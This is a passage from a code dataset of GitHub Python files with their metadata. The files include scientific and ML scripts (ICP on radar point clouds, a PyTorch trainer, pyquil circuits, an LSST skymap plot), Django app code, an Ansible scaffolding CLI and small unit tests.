q\n qP = q\n hpss = HPSS(mode='idiv', eval_obj=True, qH = qH, qP = qP, iter=100)\n _, _, obj = hpss(amp)\n # check loss\n loss = [h/qH + p/qP + idiv for h, p, idiv in obj]\n for x, y in zip(loss[:-1], loss[1:]):\n self.assertGreaterEqual(x, y)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"tachi-hi/py2shpss","sub_path":"tests/test_obj_decrease.py","file_name":"test_obj_decrease.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10931574474","text":"from jax import numpy as jnp\n\nfrom jaxdf import Domain, OnGrid\nfrom jaxdf.operators.linear_algebra import dot_product\n\n\ndef test_dot_product_ongrid():\n domain = Domain((3, 3), (0.5, 0.5))\n params_1 = jnp.ones((3, 3, 1)) * 2.0\n params_2 = jnp.ones((3, 3, 1)) * 3.0\n\n x = OnGrid(params_1, domain)\n y = OnGrid(params_2, domain)\n\n z = dot_product(x, y)\n assert z == 54.0\n","repo_name":"ucl-bug/jaxdf","sub_path":"tests/test_linear_algebra.py","file_name":"test_linear_algebra.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"38"} +{"seq_id":"28715543767","text":"bar = list(input())\nanswer = 0\nstack = []\n\nfor i in range(len(bar)):\n if bar[i] == '(':\n stack.append('chunk')\n\n else:\n if bar[i - 1] == '(':\n stack.pop()\n answer += len(stack)\n\n else:\n stack.pop()\n answer += 1\n\nprint(answer)","repo_name":"NaamuKim/algorithm","sub_path":"이찬혁/210815.py","file_name":"210815.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3970763699","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('gamesim', '0005_auto_20151227_1951'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='dispatcher_time',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('time_delta', models.TimeField(null=True)),\n ],\n ),\n ]\n","repo_name":"LarryHillyer/TexasHoldem","sub_path":"gamesim/migrations/0006_dispatcher_time.py","file_name":"0006_dispatcher_time.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9562461310","text":"import numpy as np\nimport IPython\nimport matplotlib.pyplot as plt\nfrom icp import (ls_fit, find_closest_idxs, icp, icp_randsampl,\n\t\t\t\t create_pcloud_xline, get_translation_matrix,\n\t\t\t\t filter_pcloud, get_normals, filter_normals)\nimport transforms3d\n\n\ndef load_carla_radar_npz(npz_file):\n\tdata = np.load(npz_file)\n\tpoints = data['points']\n\tcoords = data['coords']\n\treturn points, coords\n\ndef convert_carla_radar_to_point_cloud(points):\n\n\t# Trig.\n\td = np.cos(points[:, 2]) * points[:, 3]\n\tz = np.sin(points[:, 2]) * points[:, 3]\n\tx = np.cos(points[:, 1]) * d\n\ty = np.sin(points[:, 1]) * d\n\n\t# Point cloud. Flip x/y variables to get right-handed coordinate\n\t# system from the left-handed coordinate system of CARLA.\n\tp = np.zeros((3, len(d)), dtype=float)\n\tp[1, :] = x\n\tp[0, :] = y\n\tp[2, :] = z\n\n\treturn p\n\ndef load_radar_pcloud(npz_file):\n\tpoints, coords = load_carla_radar_npz(npz_file)\n\n\t# Negate z and y coordinates to get right-handed coordinate data\n\t# from coordinates of the left-handed coordinate system of CARLA.\n\tcoords[1] = -coords[1]\n\tcoords[2] = -coords[2]\n\treturn convert_carla_radar_to_point_cloud(points), coords\n\n\nif __name__ == '__main__':\n\n\t# Select scenario\n\tnpz_dict = {'pure_translation': ('Pure Translation', 'data/radar_start.npz', 'data/radar_stop.npz')}\n\tscenario = 'pure_translation'\n\tscenario_cfg = npz_dict[scenario]\n\n\t# Selet and configure the algorithms\n\talgorithms = {\n\t\t'icp': (icp, 1, {''}, 'ICP with all points'),\n\t\t# 'icp_randsampl': (icp_randsampl, 10, {''}, 'ICP with random subsampling')\n\t}\n\n\t# Select and load npz files\n\ts, start_coords = load_radar_pcloud(scenario_cfg[1])\n\td, stop_coords = load_radar_pcloud(scenario_cfg[2])\n\n\tt_truth = (stop_coords - start_coords)[0:3]\n\trax_truth, rax_angle = transforms3d.euler.euler2axangle(\n\t\t(stop_coords - start_coords)[3],\n\t\t(stop_coords - start_coords)[4],\n\t\t(stop_coords - start_coords)[5],\n\t\taxes='sxyz'\n\t)\n\n\t# Filter the points clouds\n\ts = filter_pcloud(s, z_min=0.5, z_max=5)\n\td = filter_pcloud(d, z_min=0.5, z_max=5)\n\n\talgorithm_results = {}\n\n\t# Run the algorithms and collect results\n\tfor alg, alg_cfg in iter(algorithms.items()):\n\t\ticp_func = alg_cfg[0]\n\t\ticp_iter = alg_cfg[1]\n\t\ticp_args = alg_cfg[2]\n\n\t\ts_ = np.copy(s)\n\t\td_ = np.copy(d)\n\n\t\tts = []\n\t\tRs = []\n\n\t\tfor n in np.arange(icp_iter):\n\t\t\tprint(n)\n\t\t\tR, t, e = icp_func(s_, d_)\n\t\t\tts.append(t)\n\t\t\tRs.append(R)\n\n\t\talgorithm_results[alg] = {'ts': ts, 'Rs': Rs}\n\n\tfor alg, alg_results in iter(algorithm_results.items()):\n\n\t\tts = alg_results['ts']\n\t\tRs = alg_results['Rs']\n\n\t\tt_error = np.array([np.array(t) - t_truth for t in ts])\n\t\tt_error_norm = np.linalg.norm(t_error, 2, axis=1)\n\t\tmin_error_idx = np.argmin(t_error_norm)\n\n\t\tbest_t = ts[min_error_idx]\n\t\tbest_R = Rs[min_error_idx]\n\n\t\talg_name = algorithms[alg][3]\n\n\t\tplt.figure()\n\t\tplt.title('%s: Translation Error Histogram' % alg_name)\n\t\tplt.hist(t_error_norm)\n\t\tplt.ylabel('Occurrences')\n\t\tplt.xlabel('Translation Error')\n\n\t\tplt.figure()\n\t\te = np.matmul(best_R, s) + get_translation_matrix(s, best_t)\n\t\tplt.plot(d[0, :], d[1, :], 'g+', label='stop pcloud')\n\t\tplt.plot(e[0, :], e[1, :], 'r+', label='transformed start pcloud')\n\t\tplt.title('%s\\n Stop and Transformed Point Cloud (Top View)' % alg_name)\n\t\tplt.xlabel('x (m)')\n\t\tplt.ylabel('y (m)')\n\t\tplt.legend()\n\n\tIPython.embed()","repo_name":"cgiustini/icp_experiments","sub_path":"icp_carla_data.py","file_name":"icp_carla_data.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"9192559418","text":"from curses import meta\nimport torch \nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nfrom AA_PWM_dataloader import AaPwmDataset\nclass Trainer:\n def __init__(self, \n model, \n pickle_file, \n metadata_file, \n batch_size,\n aa_mat_size, \n pwm_mat_size,\n loss_fn, \n optimizer, \n n_epochs, \n device, \n seed):\n \n with open(pickle_file, 'rb') as instream:\n dict_list = pickle.load(instream)\n \n metadata = pd.read_csv(metadata_file)\n \n #80/10/10 \n train_metadata = metadata.sample(frac = .8,random_state=seed)\n non_train_metadata = metadata[~metadata.uniprot_id.isin(train_metadata['uniprot_id'])]\n validation_metadata = non_train_metadata.sample(frac = .5, random_state = seed)\n test_metadata = non_train_metadata[~non_train_metadata.uniprot_id.isin(validation_metadata['uniprot_id'])]\n\n\n self.training_data = DataLoader(dataset = AaPwmDataset(metadata=train_metadata, \n dict_list = dict_list, \n aa_mat_size = aa_mat_size, \n pwm_mat_size = pwm_mat_size\n ), \n batch_size=batch_size\n )\n self.validation_data = DataLoader(dataset = AaPwmDataset(metadata=validation_metadata, \n dict_list = dict_list, \n aa_mat_size = aa_mat_size, \n pwm_mat_size = pwm_mat_size\n ), \n batch_size=batch_size\n )\n \n self.test_data = DataLoader(dataset = AaPwmDataset(metadata=test_metadata, \n dict_list = dict_list, \n aa_mat_size = aa_mat_size, \n pwm_mat_size = pwm_mat_size\n ), \n batch_size=batch_size\n )\n \n model.to(device)\n self.model = model\n self.loss_fn = loss_fn\n self.optimizer = optimizer\n self.n_epochs=n_epochs\n self.device =device\n \n\n def train(self, dataloader):\n size = len(dataloader.dataset)\n self.model.train()\n n_batches = len(dataloader)\n all_loss = np.repeat([None],n_batches )\n for batch_num, batch in enumerate(dataloader):\n feature, label = batch \n feature = feature.to(self.device)\n label = label.to(self.device)\n pred = self.model(feature)\n loss = self.loss_fn(pred, label)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n all_loss[batch_num] = loss.item()\n \n return np.mean(all_loss)\n\n def test(self, dataloader):\n test_size = len(dataloader.dataset)\n n_batches = len(dataloader)\n all_loss = np.repeat([None],n_batches )\n with torch.no_grad():\n for batch_num, batch in enumerate(dataloader):\n feature, label = batch \n feature = feature.to(self.device)\n label = label.to(self.device)\n pred = self.model(feature)\n loss = self.loss_fn(pred, label)\n all_loss[batch_num] = loss.item()\n return np.mean(all_loss)\n \n def train_loop(self):\n all_training_loss = []\n all_validation_loss = []\n for e in range(self.n_epochs):\n train_loss = self.train(self.training_data)\n all_training_loss.append(train_loss)\n validation_loss = self.test(self.validation_data)\n all_validation_loss.append(validation_loss)\n print(f\"{str(e+1)}/{str(self.n_epochs)} done\")\n return pd.DataFrame({'epoch' : list(range(self.n_epochs)), \n 'train_loss' : all_training_loss,\n 'validation_loss' : all_validation_loss\n })\n\n\n\n\n\n\n\n\n","repo_name":"vinay-swamy/TFSBP","sub_path":"model/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7117939951","text":"import pandas\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import FuncFormatter\n\nimport head as h\n\nstartDay = 5\nendDay = 19\n\n\ndef TopN(n):\n TotalCasesBefore = 'TotalCases0'\n TotalCasesInc = 'TotalCasesInc'\n datas = h.dataDay(startDay)[[h.Region, h.TotalCases, h.NewCases]]\n datas = h.cleanByLine(datas)\n datas[TotalCasesBefore] = datas[h.TotalCases] - datas[h.NewCases]\n datas = h.cleanByLine(datas[[h.Region, TotalCasesBefore]])\n datae = h.dataDay(endDay)[[h.Region, h.TotalCases]]\n joinData = pandas.merge(left=datas, right=datae, how='inner', left_on=h.Region, right_on=h.Region)\n joinData = h.cleanByLine(joinData)\n joinData[TotalCasesInc] = joinData[h.TotalCases] - joinData[TotalCasesBefore]\n joinData.sort_values(by=TotalCasesInc, inplace=True, ascending=False)\n joinData = joinData.iloc[0:n]\n return joinData[h.Region]\n\n\nn = 10\ncountrys = list(TopN(n))\ndays = list(range(startDay, endDay + 1))\nfor i in range(n):\n country = countrys[i]\n dataStart = h.cleanByLine(h.dataDay(startDay)[[h.Region, h.NewCases]])\n dataStart.set_index([h.Region], inplace=True)\n data = [int(dataStart.loc[country][h.NewCases])]\n\n dataDays = []\n for j in range(startDay, endDay + 1):\n dataDay = h.cleanByLine(h.dataDay(j)[[h.Region, h.TotalCases]])\n dataDay.set_index([h.Region], inplace=True)\n dataDays.append(dataDay.loc[country][h.TotalCases])\n print('||', country, dataDays)\n for j in range(endDay - startDay):\n data.append(dataDays[j + 1] - dataDays[j])\n plt.plot(days, data, lw=1, c=h.color(i), marker=None, ms=4, label='NO.' + str(i + 1) + ':\\n' + country)\n\nfig = plt.gcf()\nfig.set_size_inches(9.5, 6.5, forward=True)\n\nplt.rcParams['savefig.dpi'] = 180\nplt.rcParams['figure.dpi'] = 180\nplt.subplots_adjust(right=0.82, left=0.075)\nplt.title('New Cases From 2021-12-' + str(startDay) + ' to 2021-12-' + str(endDay))\nplt.xticks(days) # x轴的刻度\nplt.xlim(startDay - 0.1, endDay + 0.1) # x轴坐标范围\nplt.xlabel('day in Dec.2021') # x轴标注\nplt.ylabel('new cases') # y轴标注\nplt.gca().yaxis.set_major_formatter(FuncFormatter(h.showInKilo))\nplt.legend(bbox_to_anchor=(1.02, 0), loc=3, borderaxespad=0)\nplt.show()\n","repo_name":"Versocial/covid19Analyze","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40547928492","text":"from django.contrib import admin\nfrom Book.models import *\nfrom datetime import datetime\n\n\ndef make_active(modeladmin, request, queryset):\n\tqueryset.update(status='1',modified=datetime.now())\nmake_active.short_description = \"Move Items to Active\"\n\ndef make_deactive(modeladmin, request, queryset):\n\tqueryset.update(status='0',modified=datetime.now())\nmake_deactive.short_description = \"Move Items to Deactive\"\n\n\nclass MstAreasAdmin(admin.ModelAdmin):\n\texclude = [\n\t\n\t\t\t]\n\tsearch_fields = [\n\t\t\t\t\t'area_name',\n\t\t\t\t\t'area_code'\n\t\t\t\t]\n\tlist_display = [\n\t\t\t\t\t'area_name',\n\t\t\t\t\t'area_code'\n\t\t\t\t]\n\n\tactions = [make_active, make_deactive]\n\tlist_per_page = 10\n\n\tdef save_model(self, request, obj, form, change):\n\t\tif not change:\n\t\t\tobj.created = datetime.now()\n\t\telse:\n\t\t\tobj.modified = datetime.now()\n\t\tobj.save()\n\tdef has_delete_permission(self, request, obj=None):\n\t\treturn False\n\tdef has_add_permission(self, request, obj=None):\n\t\treturn False\n\n\nclass MstSeriesAdmin(admin.ModelAdmin):\n\texclude = [\n\t\n\t\t\t]\n\tsearch_fields = [\n\t\t\t\t\t'series_name',\n\t\t\t\t\t'series_code'\n\t\t\t\t]\n\tlist_display = [\n\t\t\t\t\t'series_name',\n\t\t\t\t\t'series_code'\n\t\t\t\t]\n\n\tactions = [make_active, make_deactive]\n\tlist_per_page = 10\n\n\tdef save_model(self, request, obj, form, change):\n\t\tif not change:\n\t\t\tobj.created = datetime.now()\n\t\telse:\n\t\t\tobj.modified = datetime.now()\n\t\tobj.save()\n\tdef has_delete_permission(self, request, obj=None):\n\t\treturn False\n\tdef has_add_permission(self, request, obj=None):\n\t\treturn False\n\n\nclass MstBooksAdmin(admin.ModelAdmin):\n\texclude = [\n\t\n\t\t\t]\n\tsearch_fields = [\n\t\t\t\t\t'book_type',\n\t\t\t\t\t'uuid'\n\t\t\t\t]\n\tlist_display = [\n\t\t\t\t\t'title',\n\t\t\t\t\t'book_type',\n\t\t\t\t\t'uuid'\n\t\t\t\t]\n\n\tactions = [make_active, make_deactive]\n\tlist_per_page = 10\n\n\tdef save_model(self, request, obj, form, change):\n\t\tif not change:\n\t\t\tobj.created = datetime.now()\n\t\telse:\n\t\t\tobj.modified = datetime.now()\n\t\tobj.save()\n\tdef has_delete_permission(self, request, obj=None):\n\t\treturn False\n\tdef has_add_permission(self, request, obj=None):\n\t\treturn False\n\nadmin.site.register(MstAreas,MstAreasAdmin)\nadmin.site.register(MstSeries,MstSeriesAdmin)\nadmin.site.register(MstBooks,MstBooksAdmin)","repo_name":"happy111/cotrip","sub_path":"cotrip/Book/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15990127476","text":"#!/usr/bin/env python3\n\"\"\"\nThis module contains the Ansible Wizard CLI.\n\nThe Ansible Wizard CLI is a tool for generating Ansible playbooks and roles.\n\"\"\"\n\n\nimport os\nimport sys\nimport typing\n\nimport jinja2\nimport rich.progress\nimport typer\n\nANSIBLE = typer.Typer(\n rich_markup_mode=\"rich\",\n help='Ansible Wizard CLI',\n)\n\n# This goes up 4 directories from the current file,\n# looks horrible but it works\n# TODO: Find a better way to do this\n\nANSIBLE_DIR = os.path.dirname(\n os.path.dirname(\n os.path.dirname(\n os.path.dirname(\n os.path.abspath(__file__)\n )\n )\n )\n) + '/ansible'\n\nTEMPLATING_ENGINE = jinja2.Environment(\n loader=jinja2.FileSystemLoader(searchpath='./utils/templates/')\n)\n\nANSIBLE_ROLE_DIRECTORIES = [\n 'tasks',\n 'handlers',\n 'templates',\n 'files',\n 'vars',\n 'defaults',\n 'meta',\n]\n\nANSIBLE_PLAYBOOK_SECTIONS = {\n 'general': 'General purpose playbooks',\n 'net': 'Networking playbooks',\n 'vm': 'Virtualization playbooks',\n 'k8s': 'Kubernetes playbooks',\n}\n\n\ndef generate_readme(\n name: str,\n kind: str,\n directory: str,\n) -> None:\n \"\"\"\n Generates a README.md file for a playbook or role.\n \"\"\"\n if not os.path.exists(ANSIBLE_DIR):\n typer.echo(f'ERROR: {ANSIBLE_DIR} does not exist')\n typer.Abort()\n typer.echo('Please complete the following description')\n description = typer.prompt(f'{name} is a {kind} that')\n readme_path = f'{directory}/README.md'\n typer.echo(f'Creating {readme_path}')\n template = TEMPLATING_ENGINE.get_template('README.md.j2')\n rendered_readme = template.render(\n title=name,\n kind=kind,\n description=description,\n ) + '\\n'\n with open(readme_path, 'w', encoding='utf-8') as readme_file:\n readme_file.write(rendered_readme)\n\n\ndef setup_role(role_path: str) -> None:\n \"\"\"\n Sets up the directory structure for a role.\n \"\"\"\n typer.echo('Setting up role directory structure')\n for directory in ANSIBLE_ROLE_DIRECTORIES:\n os.mkdir(f'{role_path}/{directory}')\n main_file_path = f'{role_path}/{directory}/main.yml'\n with open(main_file_path, 'w', encoding='utf-8') as main_file:\n main_file.write('---\\n')\n\n\n@ANSIBLE.command()\ndef playbook(\n playbook_section: str = typer.Argument(\n help=f\"\"\"\n Name of the playbook section to generate the playbook in.\n\n Valid options are:\n\n {os.linesep.join([\n f'{os.linesep}* [bold blue]{section}[/bold blue] - {description}'\n for section, description in ANSIBLE_PLAYBOOK_SECTIONS.items()\n ])}\n \"\"\",\n ),\n playbook_name: str = typer.Argument(help='Name of the playbook to generate'),\n roles: typing.Optional[str] = typer.Option(\n default='',\n help='List of roles to include in the playbook, delimited by commas',\n )\n) -> None:\n \"\"\"\n Creates a playbook directory with a [bold blue]README.md[/bold blue]\n and [bold blue]main.yml[/bold blue] file.\n\n If roles are specified, creates a roles directory with a README.md\n and a directory structure for each role.\n\n [bold green]Example[/bold green]:\n\n [italic]ansible-wizard playbook my-playbook-section my-playbook-name --roles role1,role2[/italic]\n \"\"\"\n if playbook_section not in ANSIBLE_PLAYBOOK_SECTIONS:\n typer.echo(f'ERROR: {playbook_section} is not a valid playbook section')\n typer.echo('Type ansible-wizard playbook --help for more information')\n sys.exit(1)\n typer.echo(\n f'Creating playbook {playbook_name} in {playbook_section} section'\n )\n playbook_path = f'{ANSIBLE_DIR}/{playbook_section}/{playbook_name}'\n if os.path.exists(playbook_path):\n typer.echo(f'ERROR: {playbook_name} already exists')\n sys.exit(1)\n os.makedirs(playbook_path, exist_ok=True)\n generate_readme(playbook_name, 'playbook', playbook_path)\n with open(f'{playbook_path}/main.yml', 'w', encoding='utf-8') as main_file:\n main_file.write('---\\n')\n typer.echo(\n f'Generated README.md and main.yml for {playbook_name} playbook'\n )\n if roles:\n roles_list = roles.split(',')\n for role_name in roles_list:\n role_path = f'{playbook_path}/roles/{role_name}'\n os.makedirs(role_path)\n generate_readme(role_name, 'role', role_path)\n typer.echo(f'Generated README.md for {role_name} role')\n setup_role(role_path)\n typer.echo(f'Generated directory structure for {role_name} role')\n\n\n@ANSIBLE.command()\ndef role(\n role_name: str = typer.Argument(help='Name of the role to generate'),\n) -> None:\n \"\"\"\n Creates a role directory with a [bold blue]README.md[/bold blue]\n and a directory structure.\n\n The new role will contain the following directories:\n\n * [bold blue]tasks[/bold blue]\n * [bold blue]handlers[/bold blue]\n * [bold blue]templates[/bold blue]\n * [bold blue]files[/bold blue]\n * [bold blue]vars[/bold blue]\n * [bold blue]defaults[/bold blue]\n\n Each directory will contain a [bold blue]main.yml[/bold blue] file.\n\n [bold green]Example[/bold green]:\n\n [italic]ansible-wizard role my-role[/italic]\n \"\"\"\n relative_path = typer.prompt(\n f'Enter playbook path (relative to ${ANSIBLE_DIR}):'\n ).rstrip('/')\n root_playbook = f\"{ANSIBLE_DIR}/{relative_path}\"\n if not os.path.exists(root_playbook):\n typer.echo(f'ERROR: {root_playbook} does not exist')\n sys.exit(1)\n typer.echo(f'Creating role {role_name}')\n role_path = f'{root_playbook}/roles/{role_name}'\n if os.path.exists(role_path):\n typer.echo(f'ERROR: role {role_name} already exists')\n sys.exit(1)\n os.makedirs(role_path, exist_ok=True)\n generate_readme(role_name, 'role', role_path)\n typer.echo(f'Generated README.md for {role_name} role')\n setup_role(role_path)\n typer.echo(f'Generated directory structure for {role_name} role')\n\n\nif __name__ == '__main__':\n ANSIBLE()\n","repo_name":"kamilrybacki/operations","sub_path":"utils/wizards/ansible.py","file_name":"ansible.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32631457463","text":"import platform\nimport os\nimport datetime\nimport logging\n\nfrom scipy.linalg import expm\nfrom pyquil.quil import Program\nfrom pyquil.quilbase import DefGate\nfrom pyquil.api import QVMConnection\nfrom pyquil.gates import CNOT, X, TRUE, FALSE, NOT, RZ, RY\nfrom pyquil.paulis import sY, exponential_map\nfrom pyquil.parameters import Parameter, quil_sin, quil_cos\n\nimport numpy as np\n\nLOGGER = logging.getLogger(\"qnn\")\nDEBUG = False\n\nANCILLARY_BIT = 1\nOUTPUT_BIT = ANCILLARY_BIT + 1\n\ndef main():\n LOGGER.info(\"Connecting to the QVM...\")\n qvm = QVMConnection()\n LOGGER.info(\"... done\")\n LOGGER.info(\" \")\n\n LOGGER.info(\"Initialising quantum program...\")\n p = Program()\n\n LOGGER.info(\"... defining custom gates\")\n LOGGER.info(\"... controlled Ry\")\n CRY = controlled_Ry(p)\n LOGGER.info(\"... controlled sY\")\n CSY = controlled_sY(p)\n LOGGER.info(\"... done\")\n LOGGER.info(\" \")\n\n a = 1\n rotation = 0.5*np.pi*(a + 1)\n theta = 0.3 * np.pi\n\n p.inst(RY(rotation, 0))\n # p.inst(CRY(theta)(0, 1)).measure(0, 0).measure(1,1)\n # LOGGER.info(\"... %s\", p)\n\n classical_flag_register = 3\n # Write out the loop initialization and body programs:\n loop_body = Program(CRY(2.*theta)(0, ANCILLARY_BIT))\n loop_body.inst(CSY(ANCILLARY_BIT, OUTPUT_BIT))\n loop_body.inst(RZ(-0.5*np.pi)(ANCILLARY_BIT))\n loop_body.inst(CRY(-2.*theta)(0, ANCILLARY_BIT))\n\n # print(qvm.wavefunction(loop_body))\n\n loop_body.measure(ANCILLARY_BIT, classical_flag_register)\n \n then_branch = Program(RY(-0.5*np.pi)(OUTPUT_BIT))\n then_branch.inst(X(ANCILLARY_BIT))\n else_branch = Program()\n\n # # Add the conditional branching:\n loop_body.if_then(classical_flag_register,\n then_branch,\n else_branch)\n\n init_register = Program(TRUE([classical_flag_register]))\n loop_prog = init_register.while_do(classical_flag_register,\n loop_body)\n p.inst(loop_prog)\n\n p.measure(0,0).measure(1,1).measure(2,2)\n\n LOGGER.info(\"... executing on the QVM\")\n classical_regs = [0, 1, 2, 3]\n output = qvm.run(p, classical_regs)\n LOGGER.info(\"... %s\", output)\n LOGGER.info(\"\")\n\ndef controlled(U):\n controlled_u = np.array([[ 1., 0., 0., 0.],\n [ 0., 1., 0., 0.],\n [ 0., 0., _ , _ ],\n [ 0., 0., _ , _ ]])\n return controlled_u\n\ndef controlled_Ry(program):\n theta = Parameter('theta')\n\n cry = np.array([[ 1., 0., 0. , 0.],\n [ 0., 1., 0. , 0.],\n [ 0., 0., quil_cos(0.5*theta) , quil_sin(0.5*theta) ],\n [ 0., 0.,-quil_sin(0.5*theta) , quil_cos(0.5*theta) ]])\n\n dg = DefGate('CRY', cry, [theta])\n program.inst(dg)\n \n return dg.get_constructor()\n\ndef controlled_sY(program):\n csy = np.array([[ 1., 0., 0. , 0. ],\n [ 0., 1., 0. , 0. ],\n [ 0., 0., 0. ,-1.j ],\n [ 0., 0., 1.j , 0. ]])\n\n dg = DefGate('CSY', csy)\n program.inst(dg)\n \n return dg.get_constructor()\n\ndef Ry(t, qubit):\n return exponential_map(sY(qubit))(-0.5*t)\n\ndef set_up_logger():\n \"\"\"This function initialises the logger.\n\n We set up a logger that prints both to the console at the information level\n and to file at the debug level. It will store in the /temp directory on\n *NIX machines and in the local directory on windows.\n \"\"\"\n timestamp = datetime.datetime.now()\n\n logfile_name = 'qnn-{0:04}-{1:02}-{2:02}-{3:02}{4:02}{5:02}.log'\\\n .format(timestamp.year,\n timestamp.month,\n timestamp.day,\n timestamp.hour,\n timestamp.minute,\n timestamp.second)\n\n if platform.system() == 'Windows':\n logfile_name = './' + logfile_name\n else:\n logfile_name = '/tmp/' + logfile_name\n\n logging.basicConfig(filename=logfile_name,\n level=logging.DEBUG)\n\n console_logger = logging.StreamHandler()\n if DEBUG:\n console_logger.setLevel(logging.DEBUG)\n else:\n console_logger.setLevel(logging.INFO)\n console_formatter = logging.Formatter('%(name)-4s: %(levelname)-8s %(message)s')\n console_logger.setFormatter(console_formatter)\n logging.getLogger('').addHandler(console_logger)\n\n LOGGER.info('All logging will be written to %s', logfile_name)\n\nif __name__ == '__main__':\n set_up_logger()\n main()\n","repo_name":"inJeans/qnn","sub_path":"sigmoid.py","file_name":"sigmoid.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"} +{"seq_id":"69910262832","text":"\"\"\"\n业务相关\n\"\"\"\n\nimport re\nfrom io import StringIO\n\nfrom django.http import Http404\nfrom markdown import Markdown\n\nfrom ..models import Floor\n\n\ndef to_shadow_text(content):\n \"\"\"\n Markdown to plain text\n \"\"\"\n\n def unmark_element(element, stream=None):\n if stream is None:\n stream = StringIO()\n if element.text:\n stream.write(element.text)\n for sub in element:\n unmark_element(sub, stream)\n if element.tail:\n stream.write(element.tail)\n return stream.getvalue()\n\n # patching Markdown\n Markdown.output_formats[\"plain\"] = unmark_element\n # noinspection PyTypeChecker\n md = Markdown(output_format=\"plain\")\n md.stripTopLevelTags = False\n\n # 该方法会把 ![text](url) 中的 text 丢弃,因此需要手动替换\n content = re.sub(r'!\\[(.+)]\\(.+\\)', r'\\1', content)\n\n return md.convert(content)\n\n\ndef find_mentions(text: str) -> list:\n \"\"\"\n 从文本中解析 mention\n Returns: []\n \"\"\"\n s = ' ' + text\n hole_ids = re.findall(r'[^#]#(\\d+)', s)\n mentions = []\n if hole_ids:\n hole_ids = list(map(lambda i: int(i), hole_ids))\n for id in hole_ids:\n floor = Floor.objects.filter(hole_id=id).first()\n if floor:\n mentions.append(floor)\n floor_ids = re.findall(r'##(\\d+)', s)\n if floor_ids:\n floor_ids = list(map(lambda i: int(i), floor_ids))\n floors = Floor.objects.filter(id__in=floor_ids)\n mentions += list(floors)\n return mentions\n\n\ndef exists_or_404(klass, *args, **kwargs):\n if hasattr(klass, '_default_manager'):\n # noinspection PyProtectedMember\n if not klass._default_manager.filter(*args, **kwargs).exists():\n raise Http404(f'{klass} 对象不存在!')\n else:\n klass__name = klass.__name__ if isinstance(klass, type) else klass.__class__.__name__\n raise ValueError(\n \"First argument to get_object_or_404() must be a Model, Manager, \"\n \"or QuerySet, not '%s'.\" % klass__name\n )\n","repo_name":"CTDancer/ChaT","sub_path":"backend/hole/utils/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29538788767","text":"import sys\nimport pickle\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.path import Path\nimport matplotlib.patches as patches\nimport lsst.afw.geom as afwGeom\nimport lsst.afw.image as afwImage\nimport lsst.daf.persistence as dafPersist\n\nimport seaborn as sns\nsns.set(context='talk',\n style='whitegrid',\n palette='deep',\n font='sans-serif',\n font_scale=0.8,\n color_codes=True,\n rc={'text.usetex': False})\n\nget_ipython().magic('matplotlib inline')\n\nDATA_DIR = '.'\n# DATA_DIR = '/global/cscratch1/sd/descdm/DC1' # ON NERSC\n\n# To access the skymap construct a butler with the repo and ask for the \"deepCoadd_skyMap\"\nbutler = dafPersist.Butler(os.path.join(DATA_DIR, 'full_focalplane_undithered'))\nskyMap = butler.get(\"deepCoadd_skyMap\")\n\ndef makePatch(vertexList, wcs):\n \"\"\"Return a path in sky coords from vertex list in pixel coords\"\"\"\n \n skyPatchList = [wcs.pixelToSky(pos).getPosition(afwGeom.degrees) for pos in vertexList]\n verts = [(coord[0], coord[1]) for coord in skyPatchList]\n verts.append((0,0))\n codes = [Path.MOVETO,\n Path.LINETO,\n Path.LINETO,\n Path.LINETO,\n Path.CLOSEPOLY,\n ]\n return Path(verts, codes) \n\ndef plotSkyMap(skyMap, tract=0, title=\"Patch Geometry\"):\n tractInfo = skyMap[tract]\n tractBox = afwGeom.Box2D(tractInfo.getBBox())\n tractPosList = tractBox.getCorners()\n wcs = tractInfo.getWcs()\n xNum, yNum = tractInfo.getNumPatches()\n\n fig = plt.figure(figsize=(12,8))\n ax = fig.add_subplot(111)\n for x in range(xNum):\n for y in range(yNum):\n patchInfo = tractInfo.getPatchInfo([x, y])\n patchBox = afwGeom.Box2D(patchInfo.getOuterBBox())\n pixelPatchList = patchBox.getCorners()\n path = makePatch(pixelPatchList, wcs)\n patch = patches.PathPatch(path, alpha=0.1, lw=1)\n ax.add_patch(patch)\n center = wcs.pixelToSky(patchBox.getCenter()).getPosition(afwGeom.degrees)\n ax.text(center[0], center[1], '%d,%d'%(x,y), size=6, ha=\"center\", 